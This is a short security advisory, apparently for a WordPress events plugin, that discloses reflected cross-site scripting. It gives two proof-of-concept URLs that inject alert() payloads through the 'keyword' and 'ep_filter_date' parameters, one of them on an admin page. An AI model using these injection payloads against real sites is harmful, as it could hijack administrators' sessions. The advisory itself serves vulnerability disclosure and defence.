Description The plugin does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
POC 1 - Visit any of the following pages created by the plugin:
- Event Organizers
- Event Types
- Performers
- Venues
Add the `keyword` parameter to the URL with following text and load the new URL to trigger the XSS.
E.g. https://example.com/event-types/?keyword=%22%3E%3Cimg%20src=x%20onerror=alert(/XSS/)%3E
---
POC 2 - Visit the following URL:
https://example.com/wp-admin/edit.php?post_type=em_event&ep_filter_date=2023-08-08"+onmouseover%3Dalert(%2FXSS%2F)+"
Mouseover the date filter input to trigger the XSS.